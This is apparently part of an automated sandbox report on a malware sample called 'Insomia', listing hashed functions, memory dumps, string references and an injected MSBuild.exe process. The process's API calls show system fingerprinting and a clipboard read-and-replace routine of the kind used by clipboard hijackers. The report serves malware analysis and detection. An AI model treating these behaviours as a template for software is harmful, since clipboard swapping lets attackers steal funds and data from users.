Instruction Fuzzy Hash: 432115B1D0825ACBEB1CCFABC8506EEBAF7BB89300F14D12AD409A7254DB754545CF80

Function 060C7EC0 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

=, xrefs: 060C7F64

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID: =
API String ID: 0-2322244508
Opcode ID: 00be01a6a4bea18239cba36600f98039aa802910d4bd8f6e5c460328e18d97d7
Instruction ID: ff4fb85ac3c612a092f0ae07d5f6f440e86807edbe8c27ccfebf65967dee6897
Opcode Fuzzy Hash: 00be01a6a4bea18239cba36600f98039aa802910d4bd8f6e5c460328e18d97d7
Instruction Fuzzy Hash: 2A219771D446588BEB58CFAB8C442DEFBF7AFC9310F14C1AA9409AA258DB7509868E40

Function 060C7EB1 Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

=, xrefs: 060C7F64

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID: =
API String ID: 0-2322244508
Opcode ID: fe151b203e348baf7a6244f26453a3c1332833f4c72ec3c4c93edc049b38809f
Instruction ID: d12ef46cc3717828746326295e6a2a9f7a925421247bfaba3c078d04918f5e77
Opcode Fuzzy Hash: fe151b203e348baf7a6244f26453a3c1332833f4c72ec3c4c93edc049b38809f
Instruction Fuzzy Hash: BF219E71D046588FEB58CF6B8D442DEFBF7AFC9310F14C17A9409AA258DB3545868E40

Function 05EF0040 Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130855093.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ef0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaab50b1354e603b9ece45f8ca482de02b079bcb5cd23c9263f9e2ef4470ec0f
Instruction ID: 4d90a4a36b1676dfcffa88c8acf93d82441445c49f4049dc1c735f7dca44caf4
Opcode Fuzzy Hash: eaab50b1354e603b9ece45f8ca482de02b079bcb5cd23c9263f9e2ef4470ec0f
Instruction Fuzzy Hash: 1C025A70B012168FDB54CFA9C498A7EFBF2BF88304F248529D69A97341DB70A951CB91

Function 05EEE058 Relevance: .4, Instructions: 431COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130815785.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f747a23dcf002f328604c696f3b8f74cce1777d38ac8ba0bfe7b7084c3accc4d
Instruction ID: 7f446529248f159df695db202704391e99550248364abf4bb21b2534409e8c68
Opcode Fuzzy Hash: f747a23dcf002f328604c696f3b8f74cce1777d38ac8ba0bfe7b7084c3accc4d
Instruction Fuzzy Hash: 1012C370E146188FDB14CFAAC980A9DFBF2BF88304F24D169D458EB21AD734A946CF50

Function 0633E928 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2132319101.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6320000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0791c33694f524509c6c9504807e598d69741dc195ef991fc9808e1c57f9f64e
Instruction ID: 9c310f3e2f6f8e9d028a54540925d5c31032e98a3aa51db1c802ac5bd07d7009
Opcode Fuzzy Hash: 0791c33694f524509c6c9504807e598d69741dc195ef991fc9808e1c57f9f64e
Instruction Fuzzy Hash: 9381F670E09228CFEB94DF99E4887EDBBF5FB49304F54902AD009AB654D7785885CF90

Function 016D370A Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bac63260da93d57692a561f47a3a72cb9efb9841e069dadc4678da76611efd8
Instruction ID: c581cd55027f163de5abb1b75dc3d4e658294d4cee5caf6244229052aaf613d8
Opcode Fuzzy Hash: 6bac63260da93d57692a561f47a3a72cb9efb9841e069dadc4678da76611efd8
Instruction Fuzzy Hash: 8E61AFB0E0811ACBEB258F6EDC1437AB6A1FF54311F09566AD4169F3D1DB788E418B43

Function 016D9248 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccdb5d3a7070b81128c4a6e26a9ca934441885bb2df96d8e9770f990447ccdda
Instruction ID: 9a79896f517deb01f0134740dce25117a71ad9df9a6aeaff15262fda92920236
Opcode Fuzzy Hash: ccdb5d3a7070b81128c4a6e26a9ca934441885bb2df96d8e9770f990447ccdda
Instruction Fuzzy Hash: 2371D274D45228CFEB64CF6ACC48B9DBAB2BF89304F00D1EAD50DA6294DB740A85CF51

Function 016D7FC0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1947448bfa7fe724c3ccfce9b54eb056cc653d968800f2070443b04f55fb4290
Instruction ID: 7927c9d5a978fbba12852336586b43afad58b0555b19dea1f606e16a6b775be0
Opcode Fuzzy Hash: 1947448bfa7fe724c3ccfce9b54eb056cc653d968800f2070443b04f55fb4290
Instruction Fuzzy Hash: B451AD71E44209DFDB10CFA8CC44BAEBBB9FB98310F108166E605EB291D7799D06CB95

Function 05EF3950 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130855093.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ef0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7ce13c5cb741fe952a8a70afea8ef1e76c9579b21852d03239a8d83430f199a
Instruction ID: 0cc1aed0fc4a28e5cb9fd1815bfc0adf3dfb64276a62bc05a87acdc39e17c3f9
Opcode Fuzzy Hash: f7ce13c5cb741fe952a8a70afea8ef1e76c9579b21852d03239a8d83430f199a
Instruction Fuzzy Hash: 16513170E05208CFDB14CFAAD588BEDBBF2FB88304F50A52AD549A7394EB749945CB50

Function 05EF3960 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130855093.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ef0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0df29bed54261bb1000705322c712ad0b060bcad3756d4fff0ec971f3a5d4ef
Instruction ID: 69fde7646a5583f5d20e152ddeca009a45efcdafe7d0c660576c87c076d3ffa7
Opcode Fuzzy Hash: f0df29bed54261bb1000705322c712ad0b060bcad3756d4fff0ec971f3a5d4ef
Instruction Fuzzy Hash: 0C513070E09208CFDB14DFAAD548BEDBBF2FB88308F10A52AD549A7254EB749D45CB50

Function 016D38FC Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7123d9ccc51bbb7117b1562f1526053fb2388c08ddeecd128c4994e4513c490b
Instruction ID: 59a41dc3458fa6da8a8d3b5a283714c513828097b933975bc47a1cdc935dd087
Opcode Fuzzy Hash: 7123d9ccc51bbb7117b1562f1526053fb2388c08ddeecd128c4994e4513c490b
Instruction Fuzzy Hash: 4551BCB0E09109CBEB258F6ADC103BAB6A1FF54311F09467AD416DF391DB748A428B43

Function 016D8028 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff75760394aea6cfb6e7e5a28beebba696db0f1b966579fd81292061ba4d13d5
Instruction ID: c11559588f4f351ab71b472eb3d54a71ba5fa76efcfaeffe8628c826e7682bd4
Opcode Fuzzy Hash: ff75760394aea6cfb6e7e5a28beebba696db0f1b966579fd81292061ba4d13d5
Instruction Fuzzy Hash: AF418071E04209DFDB10CFA9CD40BAEB7B9FB98310F108126E615EB390DB789942CB95

Function 060C116F Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62615b19fb8cc0eaa57911d21777708efe8b073ae81a0ac19b7dbd79816f3d56
Instruction ID: dfe7819e227a5aefa3ca068ba2c196e21bdf3f0facb341db44e7eb68e17e6e76
Opcode Fuzzy Hash: 62615b19fb8cc0eaa57911d21777708efe8b073ae81a0ac19b7dbd79816f3d56
Instruction Fuzzy Hash: 33615E70E14268DFDBA0CFA9C984B8DBBF1BF49314F1085A9D488EB205D734AA95CF05

Function 05EEE049 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130815785.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4bea4b19f262efd26dccfe5aa7dbb73acb2024699347be856142ad826df9a7a
Instruction ID: 520e0d5cb0658d68951509eeea61ad1a0c0380a68ef5b56123bccc44c65016a9
Opcode Fuzzy Hash: e4bea4b19f262efd26dccfe5aa7dbb73acb2024699347be856142ad826df9a7a
Instruction Fuzzy Hash: 96416B71E016198BDB08CFABC94069EFBF3BFC8300F14C07AD558AB214EB3459468B54

Function 05EF77E8 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130855093.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ef0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0fc11485e9ffc251d3915f22743cefcb7a1289ece447814c054074637e841c3
Instruction ID: 4d58ff280a3f769da3733ec933d5faf1cc7442c05e1bd5f970ed99f7d11f16bc
Opcode Fuzzy Hash: c0fc11485e9ffc251d3915f22743cefcb7a1289ece447814c054074637e841c3
Instruction Fuzzy Hash: B341C2B0D05258CBEB14CF9AD844BDDBBF2FB89304F14E0AAD549AB254EB745985CF01

Function 060BDA90 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131480600.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc687d094c319470cee4accd2a0b869bbcd985264e8c98b2a2ee46989a0ed8c4
Instruction ID: 1d4f4f1d629eef84a28e6f909a1edef612b8c4e9ce8f2dde340a2836f5811791
Opcode Fuzzy Hash: dc687d094c319470cee4accd2a0b869bbcd985264e8c98b2a2ee46989a0ed8c4
Instruction Fuzzy Hash: 4B41DEB4D00248CFDB54CFA9D984ADDFFF1AF09300F20A129E414AB294D7749885CF85

Function 016D4488 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 395950d7a158b7dd4205392306f6da1107c1ff17b4922cbad58ef8e64162a83b
Instruction ID: 8d41e36b1056e4133bb9d1f6fd932006b9a7e875cb7b5ddded70afefb7478dbf
Opcode Fuzzy Hash: 395950d7a158b7dd4205392306f6da1107c1ff17b4922cbad58ef8e64162a83b
Instruction Fuzzy Hash: 3F415F71E152559FDB10CF98CD80BAFBBB1EB48300F104126D505EBB90DE799D828B92

Function 060C0006 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26c6da229718dac5928ba66577e6c3f9233ae9389246d7df0300d50a5c1ff25f
Instruction ID: abc84b98efd0fa37b64502eabc0a443b2ed1c6353a64933444c51bb6aa7e211a
Opcode Fuzzy Hash: 26c6da229718dac5928ba66577e6c3f9233ae9389246d7df0300d50a5c1ff25f
Instruction Fuzzy Hash: B2418D71E45B588FE759CF6B8C4029AFAF3AFC9201F19C1BAC8489A265EB340546CF51

Function 05EF77D9 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130855093.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ef0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bbcd59511d9f8f6625bcab28fd97754c6059990dad731ffb622f513c227ddc1
Instruction ID: 1438dfa1d389164cef496cc98c3ed0424bcdffee99d2b684647ea4fc66dd593b
Opcode Fuzzy Hash: 6bbcd59511d9f8f6625bcab28fd97754c6059990dad731ffb622f513c227ddc1
Instruction Fuzzy Hash: 3241D2B1D052589BEB18CF9AE880BDDBBF2FB88310F14D0AAD549A7214EB745985CF44

Function 060C0040 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 964fcc43ba956c427e2a95fe524d889bc4a2b857f0c08ad0ee6da4f109780a4e
Instruction ID: 0cb896698cdfb8be69e346393045e517b0cb82e69e62713f1fc0c2d55407c1f6
Opcode Fuzzy Hash: 964fcc43ba956c427e2a95fe524d889bc4a2b857f0c08ad0ee6da4f109780a4e
Instruction Fuzzy Hash: 6B415F71E01A188FEB5CCF6B8C4029EFAF7AFC9211F54C1B9881CAA265EB300542CF41

Function 060C7028 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf0cca75489e53d1ff668211eaf4f589c05e604aff103e07deb221467c8e0aae
Instruction ID: 8374fc50d93ddbe91dc526ab6c201cea1f3be22e22bf918f6c074f349d9001a4
Opcode Fuzzy Hash: cf0cca75489e53d1ff668211eaf4f589c05e604aff103e07deb221467c8e0aae
Instruction Fuzzy Hash: B23107B0D44208CFEB58CFAAC8446EEBBF6BF88310F14C069C418A7254DB764985DF50

Function 061BC878 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131941319.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61b0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe82f690fa4818f4f43db2fa9313bf3ad4ca6cda168ebed0cb809987ed0106ba
Instruction ID: 87d643c85082a9b7ba61389778a658efa162e4611bdd7b1468d4a81284e65df6
Opcode Fuzzy Hash: fe82f690fa4818f4f43db2fa9313bf3ad4ca6cda168ebed0cb809987ed0106ba
Instruction Fuzzy Hash: 2021FFB5D042189FDB10CFA9D984AEEFBF4BF4A310F10906AE809B7210C7356941CFA4

Function 061BC880 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131941319.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61b0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1304f2be5b100a0759ae794baa7de0d13370dd01788b72c63b32c479adf25c0
Instruction ID: 015e2966f2188c5c9209f0bb718d64dd59134472e2daa31222c833e0e4a78381
Opcode Fuzzy Hash: c1304f2be5b100a0759ae794baa7de0d13370dd01788b72c63b32c479adf25c0
Instruction Fuzzy Hash: 3D21CFB5D002189FDB14DFA9D984AEEFBF5FB49314F10902AD819B7210C735A945CFA4

Function 016D9239 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fc4d62351afdd29e1809761ac787624e227cccd97da67c43fca87e739cdae50
Instruction ID: 7be3b3d70a8cfc23be2dc2e4661e1c773b98a4d89d67995d457a305679d3ed0e
Opcode Fuzzy Hash: 7fc4d62351afdd29e1809761ac787624e227cccd97da67c43fca87e739cdae50
Instruction Fuzzy Hash: BC219BB1D056188BEB68CF6BCD4838EFAF3AFC8304F14C1A9C448A6254DB744A858F51

Function 060C7018 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 971ccd540ccca5f6abf2f651fa5f680c7f4c98c0f56e7b5e1a5302c0bb6dde20
Instruction ID: 7c79b9888f9d673b2d76e3a71ad8b0d181d267a5a698e66ecd3160a7b0825d62
Opcode Fuzzy Hash: 971ccd540ccca5f6abf2f651fa5f680c7f4c98c0f56e7b5e1a5302c0bb6dde20
Instruction Fuzzy Hash: 7A1119B1D14658CBEB58CF6B89002DEBFF3AFC8210F14C1AAC508AB255EB350986DF50

Function 0633A7F8 Relevance: 5.1, Strings: 4, Instructions: 102COMMON

Download Yara Rule

Strings

(o]q, xrefs: 0633AB8C
(o]q, xrefs: 0633ACEA
\s]q, xrefs: 0633AD31
(o]q, xrefs: 0633ACD4

Memory Dump Source

Source File: 00000000.00000002.2132319101.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6320000_Insomia.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$\s]q
API String ID: 0-3126050061
Opcode ID: 87ec07d500643a02b651617e3c1561a81a7f6b628f68653533b7f6898d70e115
Instruction ID: 5b60f1d29c14e00c9574be33c36e01f1c63e0665558c4226cf71cbac96d0b201
Opcode Fuzzy Hash: 87ec07d500643a02b651617e3c1561a81a7f6b628f68653533b7f6898d70e115
Instruction Fuzzy Hash: 2C41F274E00269CFEB64CF58C840BDDBBB9FB49300F0085AAD85AA7254DB345E85CF90

Analysis Process: MSBuild.exePID: 7100, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	9.9%
Dynamic/Decrypted Code Coverage:	6.2%
Signature Coverage:	26.8%
Total number of Nodes:	257
Total number of Limit Nodes:	16

Executed Functions

Function 004126F0 Relevance: 119.3, APIs: 3, Strings: 64, Instructions: 2032COMMON

Download Yara Rule

Strings

(, xrefs: 00413176
,, xrefs: 004142BD
#, xrefs: 004141E5
5, xrefs: 00414275
5, xrefs: 004142FD
l, xrefs: 00413E18
C, xrefs: 00413BBA
1, xrefs: 00414255
+, xrefs: 0041430D
%, xrefs: 004142ED
`, xrefs: 00413839
-, xrefs: 00413FB8
D, xrefs: 00414639
?, xrefs: 00414245
K, xrefs: 004131C6
7, xrefs: 00414285
), xrefs: 0041429D
;, xrefs: 00414225
K, xrefs: 0041360C
O, xrefs: 00413BEA
-, xrefs: 0041428D
%, xrefs: 004141F5
(, xrefs: 0041361C
&, xrefs: 00413FA8
), xrefs: 00413F58
&, xrefs: 00413186
b, xrefs: 0041300C
', xrefs: 00414205
!, xrefs: 004141D5
J, xrefs: 004131BE
K, xrefs: 00413B9A
G, xrefs: 0041362C
I, xrefs: 004142CD
!, xrefs: 00413196
H, xrefs: 004131CE
/, xrefs: 004141C5
f, xrefs: 00412D25
I, xrefs: 00413BDA
N, xrefs: 0041319E
-, xrefs: 00413004
9, xrefs: 00414215
D, xrefs: 00414408
S, xrefs: 00413BCA
2, xrefs: 004142DD
<, xrefs: 004128ED
D, xrefs: 00412E6F
9, xrefs: 00413778
@, xrefs: 00412A4B
6, xrefs: 00413FD8
Q, xrefs: 00412751
8, xrefs: 00413782
0, xrefs: 00413FE8
3, xrefs: 00414265
r, xrefs: 0041317E
t, xrefs: 0041316E
L, xrefs: 004131AE
N, xrefs: 00413BAA
,, xrefs: 00412FFC
v, xrefs: 0041315E
p, xrefs: 0041318E
s, xrefs: 00412A50
-, xrefs: 004141B5
=, xrefs: 00414235
2, xrefs: 004131A6

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID:
String ID: !$!$#$%$%$&$&$'$($($)$)$+$,$,$-$-$-$-$/$0$1$2$2$3$5$5$6$7$8$9$9$;$<$=$?$@$C$D$D$D$G$H$I$I$J$K$K$K$L$N$N$O$Q$S$`$b$f$l$p$r$s$t$v
API String ID: 0-1513113214
Opcode ID: 6ae2468c5b915b86d850e4325d3650a6c9a3ee13f28d84197096170bcad536e7
Instruction ID: ff993d48e03611876791427a97588a0f6d597fe8e009bba42632f25a10350256
Opcode Fuzzy Hash: 6ae2468c5b915b86d850e4325d3650a6c9a3ee13f28d84197096170bcad536e7
Instruction Fuzzy Hash: 3E13CF7150C7C08AD3349B3889483EFBBD1ABD6324F184A6EE5E9873D2D7788546874B

Function 0043CB40 Relevance: 28.9, APIs: 11, Strings: 5, Instructions: 914
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(39383F0B,00000000,00000001,?,00000000), ref: 0043CF29
SysAllocString.OLEAUT32(24F426C7), ref: 0043CFF3
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043D034
SysAllocString.OLEAUT32(9A14A40C), ref: 0043D09F
SysAllocString.OLEAUT32(93579143), ref: 0043D155
VariantInit.OLEAUT32(?), ref: 0043D1CE
SysFreeString.OLEAUT32(00000000), ref: 0043D56B
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043D5A7

Strings

$Y, xrefs: 0043CD7A
:8, xrefs: 0043CF52
52, xrefs: 0043CF62
@A, xrefs: 0043D107
SPQV, xrefs: 0043D663

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
String ID: $Y$52$@A$SPQV$:8
API String ID: 505850577-640166853
Opcode ID: 25ea4b00ccdce48133bcba5ba63bc4c06e0c6b83f80ae7ef80eb2208258bdf35
Instruction ID: 463c23edf3ac0c42f4789e809e4f883a71cab79414ef7803e390024f84db47eb
Opcode Fuzzy Hash: 25ea4b00ccdce48133bcba5ba63bc4c06e0c6b83f80ae7ef80eb2208258bdf35
Instruction Fuzzy Hash: 8362DE71A083419BD314CF28D89579BBBE1EFC9314F18892EE5D98B391D778D806CB86

Function 032A1000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000001), ref: 032A1032
OpenClipboard.USER32(00000000), ref: 032A103C
GetClipboardData.USER32(0000000D), ref: 032A104C
GlobalLock.KERNEL32(00000000), ref: 032A105D
GlobalAlloc.KERNEL32(00000002,-00000004), ref: 032A1090
GlobalLock.KERNEL32 ref: 032A10A0
GlobalUnlock.KERNEL32 ref: 032A10C1
EmptyClipboard.USER32 ref: 032A10CB
SetClipboardData.USER32(0000000D), ref: 032A10D6
GlobalFree.KERNEL32 ref: 032A10E3
GlobalUnlock.KERNEL32(?), ref: 032A10ED
CloseClipboard.USER32 ref: 032A10F3
GetClipboardSequenceNumber.USER32 ref: 032A10F9

Memory Dump Source

Source File: 00000002.00000002.3270857757.00000000032A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000002.00000002.3270841562.00000000032A0000.00000002.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3270873495.00000000032A2000.00000002.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32a0000_MSBuild.jbxd

Similarity

API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
String ID:
API String ID: 1416286485-0
Opcode ID: d04b131ab3f241c8d491d71073032dbc0183d33d5e58f994be90837d2abc1f09
Instruction ID: a4654848690bf79967bbd795cf9dccf18fa19dc9a1d84a506be13cad67099251
Opcode Fuzzy Hash: d04b131ab3f241c8d491d71073032dbc0183d33d5e58f994be90837d2abc1f09
Instruction Fuzzy Hash: AC216A31614B41EBD7207B7ABC0CB2AB7ACFF01761F088878FC45D6044E7609850DBA1

Function 0042FCB0 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 633
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

o, xrefs: 004301E5
-!A, xrefs: 0043037F
WQ%P, xrefs: 00430355
nzm}, xrefs: 0043035D

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID:
String ID: -!A$WQ%P$nzm}$o
API String ID: 0-595633947
Opcode ID: 39f024fdce8eca3aa6935a267eb5072e9f4a8fbc6bcaa137b068aabc11a2728b
Instruction ID: 1373b380c49043cffc0c8925a2035e99e2cfbb7ccbfcbe6adc695ab9f93fb6d5
Opcode Fuzzy Hash: 39f024fdce8eca3aa6935a267eb5072e9f4a8fbc6bcaa137b068aabc11a2728b
Instruction Fuzzy Hash: 0B12D07050C3918BD729CF29C46036BBFE1AFD6304F58896EE4D59B382C7798909CB56

Function 00439A02 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 00439A2E

Strings

*, xrefs: 00439A53
-, xrefs: 00439A4C
+, xrefs: 00439A5A
Q, xrefs: 00439A45

Memory Dump Source

Source File: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269692279.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

